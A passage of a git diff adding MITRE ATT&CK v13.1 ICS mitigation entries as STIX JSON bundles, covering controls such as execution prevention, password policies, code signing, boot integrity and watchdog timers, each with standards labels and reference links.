Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 4 - AC-3; SC-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110", + "created": "2019-06-11T16:30:16.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0935", + "external_id": "M0935" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30.json new file mode 100644 index 0000000000000000000000000000000000000000..41ee94171f38ac7ed015c44f17ed0cc7f21ad510 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--575b2c0e-9b64-48b1-b078-2f1076c8c802", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.774Z", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - CR 3.2", + "NIST SP 800-53 Rev. 4 - SI-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "created": "2019-06-11T16:35:25.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0938", + "external_id": "M0938" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a.json new file mode 100644 index 0000000000000000000000000000000000000000..532ef5e83aeb9e5bd3561ccd5722b9d67d3717c2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--c5e6021a-9dfa-41ba-90d9-e6a83a95a6ab", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T14:21:27.977Z", + "name": "Static Network Configuration", + "description": "Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various AiTM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "type": "course-of-action", + "id": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0814", + "external_id": "M0814" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65.json new file mode 100644 index 0000000000000000000000000000000000000000..58df66272457d3dd8af49a162c08497334f6842d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--c6b65eaf-ca3d-4525-8bac-260ec428bbcd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:18.097Z", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.5", + "IEC 62443-4-2:2019 - CR 1.5", + "NIST SP 800-53 Rev. 4 - IA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "created": "2019-06-06T21:10:35.792Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0927", + "external_id": "M0927" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5.json new file mode 100644 index 0000000000000000000000000000000000000000..ad848a87750c045f80d92f0ef46ca1b43c389bd3 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--dea95d96-2784-4d32-a264-340694612d94", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:17.929Z", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.3", + "IEC 62443-4-2:2019 - CR 1.3", + "NIST SP 800-53 Rev. 4 - AC-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "created": "2019-06-06T21:09:47.115Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0926", + "external_id": "M0926" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0.json new file mode 100644 index 0000000000000000000000000000000000000000..b3dae18115213b0701559205fd316fefdd73ec4b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--558ef376-11d2-44a8-bc44-25b7de338151", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:14.615Z", + "name": "Human User Authentication", + "description": "Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [User Account Control](https://attack.mitre.org/mitigations/M1052).", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.1", + "IEC 62443-4-2:2019 - CR 1.1", + "NIST SP 800-53 Rev. 4 - IA-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "type": "course-of-action", + "id": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0804", + "external_id": "M0804" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c.json new file mode 100644 index 0000000000000000000000000000000000000000..605903e3ca58173b9effb94c230ccfe139e263e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--423f8cc1-f265-4d8c-8b8d-06adc54ec0db", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c", + "created": "2019-06-06T20:15:34.146Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0920", + "external_id": "M0920" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a.json new file mode 100644 index 0000000000000000000000000000000000000000..19bf72917d83cc27316101768338b6e7266350c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--521f4a70-6d12-4f55-b045-1eb1d77ebef5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:20.464Z", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.4", + "IEC 62443-4-2:2019 - CR 3.4", + "NIST SP 800-53 Rev. 4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "created": "2019-06-11T17:01:25.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0945", + "external_id": "M0945" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549.json new file mode 100644 index 0000000000000000000000000000000000000000..e833db91532688208882b22f45cffc6dbf86951f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--b3474fd4-e373-4351-a448-d8e9c758687e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:15.949Z", + "name": "Software Process and Device Authentication", + "description": "Require the authentication of devices and software processes where appropriate. Devices that connect remotely to other systems should require strong authentication to prevent spoofing of communications. Furthermore, software processes should also require authentication when accessing APIs.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.2", + "IEC 62443-4-2:2019 - CR 1.2", + "NIST SP 800-53 Rev. 4 - IA-9" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0813", + "external_id": "M0813" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a.json new file mode 100644 index 0000000000000000000000000000000000000000..24fbb18dcc9cc8afe78afff36d5dc97677ddc9cb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--f24f6754-c9f1-42fd-9be1-624865b5cf8d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:15.230Z", + "name": "Encrypt Network Traffic", + "description": "Utilize strong cryptographic techniques and protocols to prevent eavesdropping on network communications.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1", + "NIST SP 800-53 Rev. 4 - SC-8" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0808", + "external_id": "M0808" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02.json new file mode 100644 index 0000000000000000000000000000000000000000..36721a5a815d8276f6c536fc8d6533f3588141bf --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--4371515d-8be0-4d95-8aef-072372b58713", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.383Z", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.11", + "IEC 62443-4-2:2019 - CR 1.11", + "NIST SP 800-53 Rev. 4 - IA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--86b455f2-fb63-4043-93a8-32a3a7703a02", + "created": "2019-06-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0936", + "external_id": "M0936" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7.json new file mode 100644 index 0000000000000000000000000000000000000000..10bd6dee5f14e41de8b41f34668d2ad105f486fe --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--8847406c-8ec3-4aa1-bf83-5fc90c364d58", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:16.730Z", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "labels": [ + "NIST SP 800-53 Rev. 4 - AT-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7", + "created": "2017-10-25T14:48:53.732Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0913", + "external_id": "M0913" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405.json new file mode 100644 index 0000000000000000000000000000000000000000..c0979deaa0d90f726f4a657613b76ce3dc5a2b05 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--e3ee4de6-70d8-4eeb-80b9-cfebf9b15cb7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:20.632Z", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "labels": [ + "IEC 62443-4-2:2019 - CR 3.14", + "NIST SP 800-53 Rev. 4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405", + "created": "2019-06-11T17:02:36.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0946", + "external_id": "M0946" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401.json new file mode 100644 index 0000000000000000000000000000000000000000..b664f07cae1e8a69dfe961fa7f1532884301e618 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--9e0519f0-c0c5-462a-b73f-917455691305", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Mechanical Protection Layers", + "description": "Utilize a layered protection design based on physical or mechanical protection systems to prevent damage to property, equipment, human safety, or the environment. Examples include interlocks, rupture disk, release values, etc. (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) ", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0805", + "external_id": "M0805" + }, + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e.json new file mode 100644 index 0000000000000000000000000000000000000000..ef95cb7b9a43fd4a735303e57d46a5e7442b02f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--664848cc-22b1-4e92-828c-b034c76fc8e0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:21.512Z", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk. Software updates may need to be scheduled around operational down times.", + "labels": [ + "IEC 62443-4-2:2019 - CR 3.10", + "NIST SP 800-53 Rev. 4 - SI-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "created": "2019-06-11T17:12:55.207Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0951", + "external_id": "M0951" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53.json new file mode 100644 index 0000000000000000000000000000000000000000..3804e84675b62ababe321d4ebb7f1c552f8b5b7f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--124421fc-5995-4b53-bd6e-8c923d60fdbf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:16.383Z", + "name": "Watchdog Timers", + "description": "Utilize watchdog timers to ensure devices can quickly detect whether a system is unresponsive.", + "labels": [ + "IEC 62443-4-2:2019 - CR 7.2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0815", + "external_id": "M0815" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa.json new file mode 100644 index 0000000000000000000000000000000000000000..92df540a8beab27891a8268e737f30753a5b9e8f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--f77182c6-4292-43a3-9f51-4ca845af459f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:15.415Z", + "name": "Operational Information Confidentiality", + "description": "Deploy mechanisms to protect the confidentiality of information related to operational processes, facility locations, device configurations, programs, or databases that may have information that can be used to infer organizational trade-secrets, recipes, and other intellectual property (IP).", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0809", + "external_id": "M0809" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce.json new file mode 100644 index 0000000000000000000000000000000000000000..783baed8bd8dae0f92b8dae54abe7c9ce2032ef9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--36b87193-0107-4b2f-bed8-a7f1fbada820", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:18.276Z", + "name": 